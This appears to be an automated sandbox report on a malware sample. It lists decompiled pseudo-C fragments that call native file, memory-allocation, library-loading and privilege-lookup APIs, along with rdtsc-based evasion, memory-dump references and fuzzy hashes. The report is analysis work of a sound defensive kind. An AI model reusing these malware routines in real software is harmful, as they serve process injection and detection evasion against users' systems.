                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:6.2%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:3.2%
                                            Total number of Nodes:661
                                            Total number of Limit Nodes:74

                                            Graph


                                            Executed Functions

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 419dfc-419e49 call 41a950 NtReadFile
                                            APIs
                                            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 2MA$2MA
                                            • API String ID: 2738559852-947276439
                                            • Opcode ID: 5db17395fdfcde3866c4cd39893819e8865204a244fa89a264e59f5ab73f4880
                                            • Instruction ID: aff7f7320e734d1d101e19b801c814962b30e2e58a93a82651e69c0d70a24c30
                                            • Opcode Fuzzy Hash: 5db17395fdfcde3866c4cd39893819e8865204a244fa89a264e59f5ab73f4880
                                            • Instruction Fuzzy Hash: 86F0F4B2200108AFCB04DF89CC81EEB77EDAF8C314F028649BE1DA7241D634E851CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3 419e00-419e16 4 419e1c-419e49 NtReadFile 3->4 5 419e17 call 41a950 3->5 5->4
                                            C-Code - Quality: 37%
                                            			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                            				void* _t18;
                                            				void* _t27;
                                            				intOrPtr* _t28;
                                            
                                            				_t13 = _a4;
                                            				_t28 = _a4 + 0xc48;
                                            				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                            				_t6 =  &_a32; // 0x414d32
                                            				_t12 =  &_a8; // 0x414d32
                                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                            				return _t18;
                                            			}







                                            APIs
                                            • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: 2MA$2MA
                                            • API String ID: 2738559852-947276439
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 6 419d4b-419da1 call 41a950 NtCreateFile
                                            C-Code - Quality: 84%
                                            			E00419D4B(void* __esi, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                            				long _t22;
                                            				void* _t32;
                                            				void* _t39;
                                            				void* _t40;
                                            
                                            				_t40 =  <  ?  *((void*)(__esi - 0x74aa9112)) : _t39;
                                            				_t16 = _a4;
                                            				_push(__esi);
                                            				_t4 = _t16 + 0xc40; // 0xc40
                                            				E0041A950(_t32, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                            				_t12 =  &_a20; // 0x414b77
                                            				_t22 = NtCreateFile(_a8, _a12, _a16,  *_t12, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                            				return _t22;
                                            			}








                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: wKA
                                            • API String ID: 823142352-3165208591
                                            • Opcode ID: fe167bbf79f47c29bba4a50b43f339f06435c83d9809aca9a072fade74c9ada0
                                            • Instruction ID: e4e7c0c738de3cc9a5603a2b0cd1dd430a0ff74fbf256458b69800a29508ec12
                                            • Opcode Fuzzy Hash: fe167bbf79f47c29bba4a50b43f339f06435c83d9809aca9a072fade74c9ada0
                                            • Instruction Fuzzy Hash: 3601FDB2201108AFCB18CF88CC85EEB77A9AF8C314F11860CFA1CD3240C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 9 419d50-419d66 10 419d6c-419da1 NtCreateFile 9->10 11 419d67 call 41a950 9->11 11->10
                                            C-Code - Quality: 100%
                                            			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                            				long _t21;
                                            				void* _t31;
                                            
                                            				_t3 = _a4 + 0xc40; // 0xc40
                                            				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                            				_t11 =  &_a20; // 0x414b77
                                            				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                            				return _t21;
                                            			}






                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: wKA
                                            • API String ID: 823142352-3165208591
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 273 40acc0-40ace9 call 41c640 276 40aceb-40acee 273->276 277 40acef-40acfd call 41ca60 273->277 280 40ad0d-40ad1e call 41ae90 277->280 281 40acff-40ad0a call 41cce0 277->281 286 40ad20-40ad34 LdrLoadDll 280->286 287 40ad37-40ad3a 280->287 281->280 286->287
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                            • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                            • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 305 419f30-419f6d call 41a950 NtAllocateVirtualMemory
                                            C-Code - Quality: 100%
                                            			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                            				long _t14;
                                            				void* _t21;
                                            
                                            				_t3 = _a4 + 0xc60; // 0xca0
                                            				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                            				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                            				return _t14;
                                            			}






                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00419E80(intOrPtr _a4, void* _a8) {
                                            				long _t8;
                                            				void* _t11;
                                            
                                            				_t5 = _a4;
                                            				_t2 = _t5 + 0x10; // 0x300
                                            				_t3 = _t5 + 0xc50; // 0x40a913
                                            				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                            				_t8 = NtClose(_a8); // executed
                                            				return _t8;
                                            			}






                                            APIs
                                            • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E00409A80(intOrPtr* _a4) {
                                            				intOrPtr _v8;
                                            				char _v24;
                                            				char _v284;
                                            				char _v804;
                                            				char _v840;
                                            				void* _t24;
                                            				void* _t31;
                                            				void* _t33;
                                            				void* _t34;
                                            				void* _t39;
                                            				void* _t50;
                                            				intOrPtr* _t52;
                                            				void* _t53;
                                            				void* _t54;
                                            				void* _t55;
                                            				void* _t56;
                                            
                                            				_t52 = _a4;
                                            				_t39 = 0; // executed
                                            				_t24 = E00407E80(_t52,  &_v24); // executed
                                            				_t54 = _t53 + 8;
                                            				if(_t24 != 0) {
                                            					E00408090( &_v24,  &_v840);
                                            					_t55 = _t54 + 8;
                                            					do {
                                            						E0041B800( &_v284, 0x104);
                                            						E0041BE70( &_v284,  &_v804);
                                            						_t56 = _t55 + 0x10;
                                            						_t50 = 0x4f;
                                            						while(1) {
                                            							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
                                            							_t56 = _t56 + 0x10;
                                            							if(_t31 != 0) {
                                            								break;
                                            							}
                                            							_t50 = _t50 + 1;
                                            							if(_t50 <= 0x62) {
                                            								continue;
                                            							} else {
                                            							}
                                            							goto L8;
                                            						}
                                            						_t9 = _t52 + 0x14; // 0xffffe055
                                            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                            						_t39 = 1;
                                            						L8:
                                            						_t33 = E004080C0( &_v24,  &_v840);
                                            						_t55 = _t56 + 8;
                                            					} while (_t33 != 0 && _t39 == 0);
                                            					_t34 = E00408140(_t52,  &_v24); // executed
                                            					if(_t39 == 0) {
                                            						asm("rdtsc");
                                            						asm("rdtsc");
                                            						_v8 = _t34 - 0 + _t34;
                                            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                            					}
                                            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                            					_t20 = _t52 + 0x31; // 0x5608758b
                                            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                            					return 1;
                                            				} else {
                                            					return _t24;
                                            				}
                                            			}




















                                            Memory Dump Source
                                            • Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                            • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                            • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                            • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 12 41a020-41a051 call 41a950 RtlAllocateHeap
                                            C-Code - Quality: 100%
                                            			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
                                            				void* _t10;
                                            				void* _t15;
                                            
                                            				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                            				_t4 =  &_a16; // 0x414c6f
                                            				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
                                            				return _t10;
                                            			}






                                            APIs
                                            • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                            Strings
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: oLA
                                            • API String ID: 1279760036-3789366272
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 68%
                                            			E0041A053(void* __eax, void* _a4, void* _a8, void* _a12, void* _a16) {
                                            				void* _t9;
                                            				void* _t22;
                                            
                                            				_t9 = __eax - 0xed;
                                            				asm("movsb");
                                            				_t22 = 0x7972fe8e;
                                            				if (_t9 >= 0) goto L3;
                                            			}






                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                            Similarity
                                            • API ID: ExitFreeHeapProcess
                                            • String ID:
                                            • API String ID: 1180424539-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 217 40acb3-40acba 218 40ac7b-40ac7e 217->218 219 40acbc-40acbe 217->219 220 40ac84-40ac8a 218->220 221 40ac7f call 40a9e0 218->221 222 40acc1-40acdc 219->222 223 40ad16-40ad1e 219->223 224 40ac8c-40ac90 220->224 225 40acaf-40acb2 220->225 221->220 228 40ace4-40ace9 222->228 229 40acdf call 41c640 222->229 226 40ad20-40ad34 LdrLoadDll 223->226 227 40ad37-40ad3a 223->227 230 40ac93-40ac9a 224->230 226->227 231 40aceb-40acee 228->231 232 40acef-40acfd call 41ca60 228->232 229->228 230->230 233 40ac9c-40ac9f 230->233 238 40ad0d-40ad11 call 41ae90 232->238 239 40acff-40ad0a call 41cce0 232->239 233->225 235 40aca1-40aca3 233->235 237 40aca6-40acad 235->237 237->225 237->237 238->223 239->238
                                            C-Code - Quality: 46%
                                            			E0040ACB3(signed int __eax, void* __ebx, void* __edi, signed int* __esi) {
                                            				signed int _t14;
                                            				void* _t34;
                                            				void* _t35;
                                            
                                            				_t14 = __eax;
                                            				_pop(_t34);
                                            				 *__esi =  *__esi ^ __eax;
                                            				_t35 = _t34 - __esi;
                                            				asm("loope 0xffffffc1");
                                            				if (_t35 != 0) goto L7;
                                            				_push(_t35);
                                            			}







                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 243 4082eb-40833a call 41b850 call 41c3f0 call 40acc0 call 414e10 252 40833c-40834e PostThreadMessageW 243->252 253 40836e-408372 243->253 254 408350-40836a call 40a450 252->254 255 40836d 252->255 254->255 255->253
                                            C-Code - Quality: 82%
                                            			E004082EB(signed int __ebx, intOrPtr _a4, long _a8, signed int _a1428591184) {
                                            				char _v67;
                                            				char _v68;
                                            				void* _t13;
                                            				int _t14;
                                            				long _t23;
                                            				int _t28;
                                            				void* _t31;
                                            				void* _t33;
                                            				signed int _t38;
                                            
                                            				_t38 = __ebx ^ _a1428591184;
                                            				_t31 = _t33;
                                            				_v68 = 0;
                                            				E0041B850( &_v67, 0, 0x3f);
                                            				E0041C3F0( &_v68, 3);
                                            				_t13 = E0040ACC0(_t38, _a4 + 0x1c,  &_v68); // executed
                                            				_t14 = E00414E10(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
                                            				_t28 = _t14;
                                            				if(_t28 != 0) {
                                            					_t23 = _a8;
                                            					_t14 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                                            					_t40 = _t14;
                                            					if(_t14 == 0) {
                                            						_t14 =  *_t28(_t23, 0x8003, _t31 + (E0040A450(_t40, 1, 8) & 0x000000ff) - 0x40, _t14);
                                            					}
                                            				}
                                            				return _t14;
                                            			}













                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 258 4082f0-4082ff 259 408308-40833a call 41c3f0 call 40acc0 call 414e10 258->259 260 408303 call 41b850 258->260 267 40833c-40834e PostThreadMessageW 259->267 268 40836e-408372 259->268 260->259 269 408350-40836a call 40a450 267->269 270 40836d 267->270 269->270 270->268
                                            C-Code - Quality: 82%
                                            			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                            				char _v67;
                                            				char _v68;
                                            				void* _t12;
                                            				intOrPtr* _t13;
                                            				int _t14;
                                            				long _t21;
                                            				intOrPtr* _t25;
                                            				void* _t26;
                                            				void* _t30;
                                            
                                            				_t30 = __eflags;
                                            				_v68 = 0;
                                            				E0041B850( &_v67, 0, 0x3f);
                                            				E0041C3F0( &_v68, 3);
                                            				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
                                            				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                            				_t25 = _t13;
                                            				if(_t25 != 0) {
                                            					_t21 = _a8;
                                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                            					_t32 = _t14;
                                            					if(_t14 == 0) {
                                            						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                            					}
                                            					return _t14;
                                            				}
                                            				return _t13;
                                            			}













                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 288 41a092-41a099 289 41a105-41a128 288->289 290 41a09b-41a0b9 288->290 291 41a0bf-41a0c8 ExitProcess 290->291 292 41a0ba call 41a950 290->292 292->291
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            control_flow_graph 294 41a1b7-41a1b8 295 41a148-41a152 call 41a950 294->295 296 41a1ba-41a1bb 294->296 297 41a155-41a164 295->297 296->297 298 41a1bd-41a1d9 296->298 303 41a1df-41a1f4 LookupPrivilegeValueW 298->303 304 41a1da call 41a950 298->304 304->303
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                            				int _t10;
                                            				void* _t15;
                                            
                                            				_t3 = _a4 + 0xc8c; // 0xc8c
                                            				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                            				return _t10;
                                            			}






                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            C-Code - Quality: 55%
                                            			E00416C6A(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
                                            				signed int _t29;
                                            				void* _t46;
                                            				void* _t56;
                                            				void* _t64;
                                            				signed int _t67;
                                            
                                            				_t64 = __esi;
                                            				_t56 = __edx;
                                            				_t46 = __ebx;
                                            				_t29 = __eax;
                                            				_pop(ss);
                                            				_t67 =  *(__ecx - 0x41d8f774) * 0x7d;
                                            				while((_t29 & 0xbe27088c) < 0) {
                                            					_t56 = _t56 +  *((intOrPtr*)(_t67 - 0xc8c2020));
                                            				}
                                            				_pop(ds);
                                            				asm("int3");
                                            				_push(_t56);
                                            				_push(0xbf);
                                            				 *[es:esi] = cs;
                                            				return 0x6a;
                                            			}









                                            Strings
                                            Similarity
                                            • API ID:
                                            • String ID: $: $: $Host$Host: $Unknown
                                            • API String ID: 0-3527920956
                                            • Opcode ID: 5ac0276e0a573ea21358f1acf84f707b058c080f7d0181f0e81d9d4b7d302fd6
                                            • Instruction ID: b93b48c4ea2cbb05e33f7cd82803dd3b63bb1d8fa079e8a43c5d9f8e05f05982
                                            • Opcode Fuzzy Hash: 5ac0276e0a573ea21358f1acf84f707b058c080f7d0181f0e81d9d4b7d302fd6
                                            • Instruction Fuzzy Hash: F6213476900308AADB11DA85CC81BEBB3B8EF88308F00955FF9599B285D379A54187E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 25%
                                            			E0040E42F(void* __eax, void* __edx, void* __esi) {
                                            				void* _t14;
                                            
                                            				asm("cmpsd");
                                            				 *(_t14 + 0x11) =  *(_t14 + 0x11) >> 0x65;
                                            				asm("sbb [ecx-0x2d], edi");
                                            				asm("sbb eax, 0xc9172a64");
                                            				return __esi;
                                            			}





                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: e
                                            • API String ID: 0-4024072794
                                            • Opcode ID: 1f9556c4e73d5fe6cc2529f85b540bddcc740cfbcfc4327359c8732a2dfc4ae2
                                            • Instruction ID: 0407faf0a63912aadcd30bb6a4b9a4ebbd8a79f51aec037948bea230879abee2
                                            • Opcode Fuzzy Hash: 1f9556c4e73d5fe6cc2529f85b540bddcc740cfbcfc4327359c8732a2dfc4ae2
                                            • Instruction Fuzzy Hash: 5DD0A711645A554686204D686C062F8E3B14AC7D35F04529ADD08A7CD04603C06642D9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Execution Graph

                                            Execution Coverage:6.6%
                                            Dynamic/Decrypted Code Coverage:2.1%
                                            Signature Coverage:0%
                                            Total number of Nodes:580
                                            Total number of Limit Nodes:67

                                            Graph


                                            Executed Functions

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 250 189d50-189da1 call 18a950 NtCreateFile
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00184B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00184B77,007A002E,00000000,00000060,00000000,00000000), ref: 00189D9D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_170000_systray.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID: .z`
                                            • API String ID: 823142352-1441809116
                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction ID: 400ee49e061f3e91114ef1ea71e821feceb8fa1d92fa44e95e429e03301dda77
                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                            • Instruction Fuzzy Hash: F9F0BDB2204208AFCB08DF88DC95EEB77ADAF8C754F158248FA1D97241C630E8118BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 247 189d4b-189d66 248 189d6c-189da1 NtCreateFile 247->248 249 189d67 call 18a950 247->249 249->248
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00184B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00184B77,007A002E,00000000,00000060,00000000,00000000), ref: 00189D9D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                            Joe Sandbox IDA Plugin
